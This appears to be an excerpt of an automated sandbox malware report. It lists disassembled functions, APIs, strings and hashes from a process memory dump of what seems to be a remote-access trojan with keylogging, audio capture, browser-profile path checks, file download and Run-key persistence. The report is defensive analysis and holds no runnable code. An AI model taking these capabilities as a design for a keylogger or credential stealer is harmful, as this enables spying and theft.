                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DownloadFileSleep
                  • String ID: !D@
                  • API String ID: 1931167962-604454484
                  • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                  • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                  • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                  • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: alarm.wav$hYG
                  • API String ID: 1174141254-2782910960
                  • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                  • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                  • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                  • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                  APIs
                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • CloseHandle.KERNEL32(?), ref: 0040B0B4
                  • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                  • String ID: Online Keylogger Stopped
                  • API String ID: 1623830855-1496645233
                  • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                  • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                  • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                  • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                  APIs
                  • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                  • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: wave$BufferHeaderPrepare
                  • String ID: XMG
                  • API String ID: 2315374483-813777761
                  • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                  • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                  APIs
                  • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocaleValid
                  • String ID: IsValidLocaleName$JD
                  • API String ID: 1901932003-2234456777
                  • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                  • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                  • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                  • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                  • API String ID: 1174141254-4188645398
                  • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                  • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                  • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                  • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                  • API String ID: 1174141254-2800177040
                  • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                  • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                  • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                  • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: AppData$\Opera Software\Opera Stable\
                  • API String ID: 1174141254-1629609700
                  • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                  • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                  • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                  • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                  APIs
                  • GetKeyState.USER32(00000011), ref: 0040B64B
                    • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                    • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                    • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                    • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                    • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                  • String ID: [AltL]$[AltR]
                  • API String ID: 2738857842-2658077756
                  • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                  • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                  • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                  • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                  APIs
                  • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                  • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: uD
                  • API String ID: 0-2547262877
                  • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                  • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                  • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                  • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$FileSystem
                  • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                  • API String ID: 2086374402-949981407
                  • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                  • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                  • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                  • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell
                  • String ID: !D@$open
                  • API String ID: 587946157-1586967515
                  • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                  • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                  • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                  • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                  APIs
                  • ___initconout.LIBCMT ref: 0045555B
                    • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B30
                  • WriteConsoleW.KERNEL32 ref: 0045557E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ConsoleCreateFileWrite___initconout
                  • String ID: PkGNG
                  • API String ID: 3087715906-263838557
                  • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                  • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                  • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                  • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                  APIs
                  • GetKeyState.USER32(00000012), ref: 0040B6A5
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: State
                  • String ID: [CtrlL]$[CtrlR]
                  • API String ID: 1649606143-2446555240
                  • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                  • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                  • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                  • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                  APIs
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  • __Init_thread_footer.LIBCMT ref: 00410F29
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Init_thread_footer__onexit
                  • String ID: ,kG$0kG
                  • API String ID: 1881088180-2015055088
                  • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                  • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                  • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                  • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                  APIs
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteOpenValue
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                  • API String ID: 2654517830-1051519024
                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                  • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                  • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                  • GetLastError.KERNEL32 ref: 00440D35
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorLast
                  • String ID:
                  • API String ID: 1717984340-0
                  • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                  • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                  • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                  • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                  APIs
                  • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                  • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                  • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                  • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLastRead
                  • String ID:
                  • API String ID: 4100373531-0
                  • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                  • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                  • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                  • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99